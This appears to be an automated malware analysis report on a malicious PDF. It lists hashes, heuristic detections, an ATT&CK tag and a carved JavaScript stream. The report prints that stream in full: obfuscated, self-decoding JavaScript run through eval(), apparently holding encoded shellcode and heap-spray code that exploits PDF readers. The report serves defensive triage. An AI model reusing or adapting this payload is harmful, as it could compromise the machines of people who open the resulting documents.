PDF malware analysis — malicious · a60409e58c9deeaf

MALICIOUS

PDF

9.2 KB Created: 2010-05-19 18:51:51 Authoring application: kc2D3hwzj (via lOO3O) First seen: 2026-05-11

MD5: b81a283fea1b7fe20c354e780a416d9e SHA-1: 992cca08f60289c93a22271609b301e71631ed18 SHA-256: a60409e58c9deeaf49998860382709d73f5077654fa10c2e42e18e4ba29a9d6f

166 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval() for code execution. The embedded JavaScript stream, named 'javascript_obj0007_000.js', is likely responsible for obfuscated code execution, potentially downloading and executing a secondary payload. The authoring application 'kc2D3hwzj' and the presence of obfuscation indicators further support this assessment.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

5GBMXTFl( jDsm==mV,b\nmmmmJjr1iI7iLz0oBlajm=mxGX2FiqXv\"%xrzrz%xrzrz%xrzrz%x<tnL%xzzNL%x44J9%xw<L9%xw<<T%xntzz%xnVrz%xnLt8%xnw<N%xttnJ%xtttt%xwL5t%xEtrn%xntnt%x4rnt%xnz8t%x9t4r%xrVtz%x9t4r%x4nn5%xnt<z%xntnL%x4rnt%xL9<z%x4Tw5%xnT8T%x<5<z%xntTT%xntnt%x8844%xL9nL%x55w5%x4NTT%x<5nT%xntTt%xntnt%x8844%xL9n5%xJ8w5%xT<Nt%x<5VE%xnt<E%xntnt%x8844%xL9nz%x<<w5%x<tVT%x<5wt%xntzL%xntnt%x8844%xL9tt%xVnw5%x<894%x<5N5%xntV9%xntnt%x8844%x8ttL%xE54t%x98VJ%x44TN%xt588%xnw<4%xntnn%xLTnt%x9844%x4rJL%xnL88%xnnwN%x4rL4 …

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0007_000.js`	pdf-javascript-stream	PDF /JS object 7 at offset 0x239	8023 bytes
SHA-256: `83425ecc5f0fa0842cac94937486aa7ac8e61f2092f6235808bc094840dec077`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). 104 of 154 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script function zW5qjQVTJse7i(zW5qjQVTJse7i,IpLcpEQ) {var UTCOj4=zW5qjQVTJse7i. substr (IpLcpEQ, 1);return UTCOj4;}/ZCuiTZMim86e5vC822\|lhQCnkWpz6knVmY46yGf\|Eb6AN88F08rX/function AiCKRZ(hmOqRzY6xWNsUrkHTROe) {/uBzHroER\|Z4rU0faV7\|x3fA1eGscxGr/var UPhMxkWFAUmm = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/HgpyKtGdJAKe0[AMnZ9g4AYZGH24N]cVFIJQ2PuCQ4gG//aTO0TuvTJKZQCU\|lwzr498wPsyf\|UmOv5clOMXiWh8m/var T4Xr0KDE3Ywdf /SGME64952vKlkp[ARdrN5Tc]qAeO8Hy/= new String("ucv,bKmS}8LJEnta>R{h(7 yHdOY)PM.eoIiCF6Xkl1sfDjZGBqpA2Qx0W3Ug<TVzrN45w9");/OAVK4UFxG\|Zq6omNITb\|m3MS3/for(uulNE0=0;uulNE0<UPhMxkWFAUmm.length;uulNE0++) {if(hmOqRzY6xWNsUrkHTROe == zW5qjQVTJse7i(T4Xr0KDE3Ywdf, uulNE0)) {/g2yVICVdNQxSE4jd[fIMtQfKUIEga7N]ABS8EncR4Qk8KJbvok8X/return zW5qjQVTJse7i(UPhMxkWFAUmm, uulNE0);/eiKmmrDk4Aa5SZA62R <J1zTBQFp1DDrhm2KOj]zdNQZgqZ/}}return hmOqRzY6xWNsUrkHTROe;}/irTrjJBkZHPR[T8s513K]G94UPU16uUe//oMAxOkNV0egK\|PFUJPvQPple9\|btx6LbIMPXxd/var AnzPrbE26 = new String;var P1kzH6JRonPMvX27zhC = new String("\n0iAmxky2Z L)y1G(PpOWm=mGXWm8AAiUv,;\n0iAm 0Wrwq4o3J goiJO;\nkxGFQsBGmni{z3P.7J{118<6rv>i5LdJD H97UfIHg}mOszwEo)HAL5VhDNH,b\nmmW1sjXmv>i5LdJD H97UfIHgSjXGlQ1mmVmumOszwEo)HAL5VhDNH,b\nmmmm>i5LdJD H97UfIHgm+=m>i5LdJD H97UfIHg;\nmmK\nmm>i5LdJD H97UfIHgm=m>i5LdJD H97UfIHgS2xC2QAsGlv<}mOszwEo)HAL5VhDNHm/mV,;\nmmAXQxAGm>i5LdJD H97UfIHg;\nK\nkxGFQsBGmxLCjy79GPMjEN8Env3t(5GBMXTFl( jDs,b\nmm0iAmx7)(sF9EwQOJNXd3m=m<3<F<F<F<F;\nmm0iAmJjr1iI7iLz0oBlajm=mxGX2FiqXv\"%xrzrz%xrzrz%xrzrz%x<tnL%xzzNL%x44J9%xw<L9%xw<<T%xntzz%xnVrz%xnLt8%xnw<N%xttnJ%xtttt%xwL5t%xEtrn%xntnt%x4rnt%xnz8t%x9t4r%xrVtz%x9t4r%x4nn5%xnt<z%xntnL%x4rnt%xL9<z%x4Tw5%xnT8T%x<5<z%xntTT%xntnt%x8844%xL9nL%x55w5%x4NTT%x<5nT%xntTt%xntnt%x8844%xL9n5%xJ8w5%xT<Nt%x<5VE%xnt<E%xntnt%x8844%xL9nz%x<<w5%x<tVT%x<5wt%xntzL%xntnt%x8844%xL9tt%xVnw5%x<894%x<5N5%xntV9%xntnt%x8844%x8ttL%xE54t%x98VJ%x44TN%xt588%xnw<4%xntnn%xLTnt%x9844%x4rJL%xnL88%xnnwN%x4rL4%xt5L8%x<5L9%xnt4r%xntnt%xw5Lt%xtNE9%x9tJ<%x5w<5%xntnt%x44nt%xtz88%xV84r%xVt4J%x44Lt%xJt88%xT<w5%xntnt%xLtnt%x884r%xwNtL%xL4nE%xL84r%x<5t5%xntwn%xntnt%x88nJ%xVwJt%xLznt%xJT9T%xVww8%xnL8t%xw895%xntnt%x98T<%x4rJt%xnz88%xnnwN%x4rL4%xt5L8%x8t<5%xntnt%xwNnt%xL5nw%x88nJ%xEJJL%xLJzr%xT<LJ%xJt98%xLJLt%x884r%xwNtz%xL4n8%xL84r%x<5t5%xntJJ%xntnt%xntwN%x98T<%x4rJt%xn588%xnEwN%x4rL4%xt5L8%xtt<5%xntnt%xwNnt%x4rT<%xtt88%xnnwN%x4rL4%xt5L8%xnt<5%xntnt%x8nnt%xLELr%x<nnJ%x<nnJ%x<nnJ%x<nnJ%x<z4J%xLNnL%x4rLJ%x<EzN%xLETw%x<tT<%x4rL8%x4r<z%xn59V%xLV4r%xL9nz%x9J4r%x4rEz%xtT9L%xnJ95%xL9TJ%x994r%xnJJt%xEJTJ%x84V4%xrV8n%xVJnJ%xEJL9%xn<T9%xttNT%xTEEN%xn59L%xVTVn%xnJnV%x8tTE%xTn<r%xTTEr%x98LT%xLN<8%x<r4r%xLN4r%xnJJL%xw9zV%xnz4r%x4r8r%xtzLN%xzVnJ%xnL4r%xnJ4r%xLTV8%xVELV%xntn5%xTL<5%xT<TT%xL8T<%x8zLE%x8<8V%xnt8T%x5r4w%x5<5r%xVtz8%x4rVt%x4Ez<%xzT4T%x5z4n%x49Vn%x444n%xVt4t%x4J4V%x454t%x4JVt%x4T4t%xVn4r%x4w5<%xzt5<%x4r49%xz9zE%x<<z5\",;\nmmskmv3t(5GBMXTFl( jDsm==mT,b\nmmmmx7)(sF9EwQOJNXd3m=m<3z<z<z<z<;\nmmmmJjr1iI7iLz0oBlajm=mxGX2FiqXv\"%xrzrz%xrzrz%xrzrz%x<tnL%xzzNL%x44J9%xw<L9%xw<<T%xntzz%xnVrz%xnLt8%xnw<N%xttnJ%xtttt%xwL5t%xEtrn%xntnt%x4rnt%xnz8t%x9t4r%xrVtz%x9t4r%x4nn5%xnt<z%xntnL%x4rnt%xL9<z%x4Tw5%xnT8T%x<5<z%xntTT%xntnt%x8844%xL9nL%x55w5%x4NTT%x<5nT%xntTt%xntnt%x8844%xL9n5%xJ8w5%xT<Nt%x<5VE%xnt<E%xntnt%x8844%xL9nz%x<<w5%x<tVT%x<5wt%xntzL%xntnt%x8844%xL9tt%xVnw5%x<894%x<5N5%xntV9%xntnt%x8844%x8ttL%xE54t%x98VJ%x44TN%xt588%xnw<4%xntnn%xLTnt%x9844%x4rJL%xnL88%xnnwN%x4rL4%xt5L8%x<5L9%xnt4r%xntnt%xw5Lt%xtNE9%x9tJ<%x5w<5%xntnt%x44nt%xtz88%xV84r%xVt4J%x44Lt%xJt88%xT<w5%xntnt%xLtnt%x884r%xwNtL%xL4nE%xL84r%x<5t5%xntwn%xntnt%x88nJ%xVwJt%xLznt%xJT9T%xVww8%xnL8t%xw895%xntnt%x98T<%x4rJt%xnz88%xnnwN%x4rL4%xt5L8%x8t<5%xntnt%xwNnt%xL5nw%x88nJ%xEJJL%xLJzr%xT<LJ%xJt98%xLJLt%x884r%xwNtz%xL4n8%xL84r%x<5t5%xntJJ%xntnt%xntwN%x98T<%x4rJt%xn588%xnEwN%x4rL4%xt5L8%xtt<5%xntnt%xwNnt%x4rT<%xtt88%xnnwN%x4rL4%xt5L8%xnt<5%xntnt%x8nnt%xLELr%x<nnJ%x<nnJ%x<nnJ%x<nnJ%x<z4J%xLNnL%x4rLJ%x<EzN%xLETw%x<tT<%x4rL8%x4r<z%xn59V%xLV4r%xL9nz%x9J4r%x4rEz%xtT9L%xnJ95%xL9TJ%x994r%xnJJt%xEJTJ%x84V4%xrV8n%xVJnJ%xEJL9%xn<T9%xttNT%xTEEN%xn59L%xVTVn%xnJnV%x8tTE%xTn<r%xTTEr%x98LT%xLN<8%x<r4r%xLN4r%xnJJL%xw9zV%xnz4r%x4r8r%xtzLN%xzVnJ%xnL4r%xnJ4r%xLTV8%xVELV%xntn5%xTL<5%xT<TT%xL8T<%x8zLE%x8<8V%xnt8T%x5r4w%x5<5r%xVtz8%x4rVt%x4Ez<%xzT4T%x5z4n%x49Vn%x444n%xVt4t%x4J4V%x454t%x4JVt%x4T4t%xVn4r%x4w5<%xzt5<%x4r49%xz9zE%x<<z5\",;\nmmK\nmmXj2Xmskmv3t(5GBMXTFl( jDsm==mV,b\nmmmmJjr1iI7iLz0oBlajm=mxGX2FiqXv\"%xrzrz%xrzrz%xrzrz%x<tnL%xzzNL%x44J9%xw<L9%xw<<T%xntzz%xnVrz%xnLt8%xnw<N%xttnJ%xtttt%xwL5t%xEtrn%xntnt%x4rnt%xnz8t%x9t4r%xrVtz%x9t4r%x4nn5%xnt<z%xntnL%x4rnt%xL9<z%x4Tw5%xnT8T%x<5<z%xntTT%xntnt%x8844%xL9nL%x55w5%x4NTT%x<5nT%xntTt%xntnt%x8844%xL9n5%xJ8w5%xT<Nt%x<5VE%xnt<E%xntnt%x8844%xL9nz%x<<w5%x<tVT%x<5wt%xntzL%xntnt%x8844%xL9tt%xVnw5%x<894%x<5N5%xntV9%xntnt%x8844%x8ttL%xE54t%x98VJ%x44TN%xt588%xnw<4%xntnn%xLTnt%x9844%x4rJL%xnL88%xnnwN%x4rL4%xt5L8%x<5L9%xnt4r%xntnt%xw5Lt%xtNE9%x9tJ<%x5w<5%xntnt%x44nt%xtz88%xV84r%xVt4J%x44Lt%xJt88%xT<w5%xntnt%xLtnt%x884r%xwNtL%xL4nE%xL84r%x<5t5%xntwn%xntnt%x88nJ%xVwJt%xLznt%xJT9T%xVww8%xnL8t%xw895%xntnt%x98T<%x4rJt%xnz88%xnnwN%x4rL4%xt5L8%x8t<5%xntnt%xwNnt%xL5nw%x88nJ%xEJJL%xLJzr%xT<LJ%xJt98%xLJLt%x884r%xwNtz%xL4n8%xL84r%x<5t5%xntJJ%xntnt%xntwN%x98T<%x4rJt%xn588%xnEwN%x4rL4%xt5L8%xtt<5%xntnt%xwNnt%x4rT<%xtt88%xnnwN%x4rL4%xt5L8%xnt<5%xntnt%x8nnt%xLELr%x<nnJ%x<nnJ%x<nnJ%x<nnJ%x<z4J%xLNnL%x4rLJ%x<EzN%xLETw%x<tT<%x4rL8%x4r<z%xn59V%xLV4r%xL9nz%x9J4r%x4rEz%xtT9L%xnJ95%xL9TJ%x994r%xnJJt%xEJTJ%x84V4%xrV8n%xVJnJ%xEJL9%xn<T9%xttNT%xTEEN%xn59L%xVTVn%xnJnV%x8tTE%xTn<r%xTTEr%x98LT%xLN<8%x<r4r%xLN4r%xnJJL%xw9zV%xnz4r%x4r8r%xtzLN%xzVnJ%xnL4r%xnJ4r%xLTV8%xVELV%xntn5%xTL<5%xT<TT%xL8T<%x8zLE%x8<8V%xnt8T%x5r4w%x5<5r%xVtz8%x4rVt%x4Ez<%xzT4T%x5z4n%x49Vn%x444n%xVt4t%x4J4V%x454t%x4JVt%x4T4t%xVn4r%x4w5<%xzt5<%x4r49%xz9zE%x<<z5\",;\nmmK\nmm0iAmQD5D7n3)9HlJr583m=m<3r<<<<<;\nmm0iAmFEXOZTzUrU.AXGF1m=mJjr1iI7iLz0oBlajSjXGlQ1mmV;\nmm0iAmOszwEo)HAL5VhDNHm=mQD5D7n3)9HlJr583m-mvFEXOZTzUrU.AXGF1m+m<3zw,;\nmm0iAm>i5LdJD H97UfIHgm=mxGX2FiqXv\"%x9<9<%x9<9<\",;\nmm>i5LdJD H97UfIHgm=mni{z3P.7J{118<6rv>i5LdJD H97UfIHg}mOszwEo)HAL5VhDNH,;\nmm0iAmDfOxUHy5BN{28Pqzm=mvx7)(sF9EwQOJNXd3m-m<3r<<<<<,m/mQD5D7n3)9HlJr583;\nmmkBAmv0iAmB)PPP.YeMgH8GzA(m=m<;mB)PPP.YeMgH8GzA(mumDfOxUHy5BN{28Pqz;mB)PPP.YeMgH8GzA(m++m,b\nmmmmxky2Z L)y1G(PpOW[B)PPP.YeMgH8GzA(]m=m>i5LdJD H97UfIHgm+mJjr1iI7iLz0oBlaj;\nmmK\nK\nkxGFQsBGmG{tff6pos8d2Xax7v,b\nmm0iAmqHptW{ZO{JC5n)YTm=m<;\nmm0iAmy1D.(iNrjMWdZAZem=miqqS0sXWXAMXA2sBGSQBYQAsGlv,;\nmmiqqSFjXiA)sZXyxQv 0Wrwq4o3J goiJO,;\n\nmmskmvy1D.(iNrjMWdZAZemum5ST,b\nmmmmxLCjy79GPMjEN8Env<,;\nmmmm0iAmC6ZJ3oXaDa gfqg.m=mxGX2FiqXv\"%x<F<F%x<F<F\",;\nmmmmW1sjXmvC6ZJ3oXaDa gfqg.SjXGlQ1mumrr9NV,C6ZJ3oXaDa gfqg.m+=mC6ZJ3oXaDa gfqg.;\nmmmmQ1s2mSFBjjiCYQBAXm=mJBjjiCSFBjjXFQnZisjRGkBvb\nmmmmmm2xCfm:m\"\"}mZ2lm:mC6ZJ3oXaDa gfqg.\nmmmmK\nmmmm,;\nmmK\nskmvy1D.(iNrjMWdZAZemc=m9,b\nmmmmQAUmb\nskmviqqS6BFSJBjjiCSlXQRFBG,b\nmmmmmmmmxLCjy79GPMjEN8EnvV,;\nmmmmmmmm0iAm3fr2h9W4XQ.dD{3Vm=mxGX2FiqXv\"%<9\",;\nmmmmmmmmW1sjXmv3fr2h9W4XQ.dD{3VSjXGlQ1mum<3r<<<,3fr2h9W4XQ.dD{3Vm+=m3fr2h9W4XQ.dD{3V;\nmmmmmmmm3fr2h9W4XQ.dD{3Vm=m\" S\"m+m3fr2h9W4XQ.dD{3V;\niqqS6BFSJBjjiCSlXQRFBGv3fr2h9W4XQ.dD{3V,;\nmmmmmmmmqHptW{ZO{JC5n)YTm=mT;\nmmmmmmK\nmmmmmmXj2Xmb\nmmmmmmmmqHptW{ZO{JC5n)YTm=mT;\nmmmmmmK\nmmmmK\nmmmmFiQF1mvX,b\nmmmmmmqHptW{ZO{JC5n)YTm=mT;\nmmmmK\nmmmmskmvqHptW{ZO{JC5n)YTm==mT,b\nmmmmmmskmvvy1D.(iNrjMWdZAZemc=m5ST&&my1D.(iNrjMWdZAZemum9,,b\nmmmmmmmmxLCjy79GPMjEN8EnvT,;\nmmmmmmmm0iAmGfnxR28r<oz2 VHxm=m\"TV999999999999999999\";\nmmmmmmmmkBAmvYYG4ifLnF1k TFH3m=m<;mYYG4ifLnF1k TFH3mumV54;mYYG4ifLnF1k TFH3m++m,b\nmmmmmmmmmmGfnxR28r<oz2 VHxm+=m\"w\";\nmmmmmmmmK\nmmmmmmmmxQsjSqAsGQkv\"%rN<<<k\"}mGfnxR28r<oz2 VHx,;\nmmmmmmK\nmmmmK\nmmK\nK\niqqSM6AX.zskiDeUZ32em=mG{tff6pos8d2Xax7;\n 0Wrwq4o3J goiJOm=miqqS2XQ)sZXyxQv\"iqqSM6AX.zskiDeUZ32ev,\"}mT<,;\n");/n7Qxbg3vpIg6XMh2{AT5xQHPZ}ewG8gu5xiW//cI9kp681d1\|dL9Rb\|h0aCnh/for(zAtoQb=0;zAtoQb<P1kzH6JRonPMvX27zhC.length;zAtoQb++)AnzPrbE26 += AiCKRZ(zW5qjQVTJse7i(P1kzH6JRonPMvX27zhC,zAtoQb));eval(AnzPrbE26);/JR560[QSaQ3FM27]uAK59cWF9NgB0DB/

Open this report in the interactive analyzer, or submit your own file for analysis.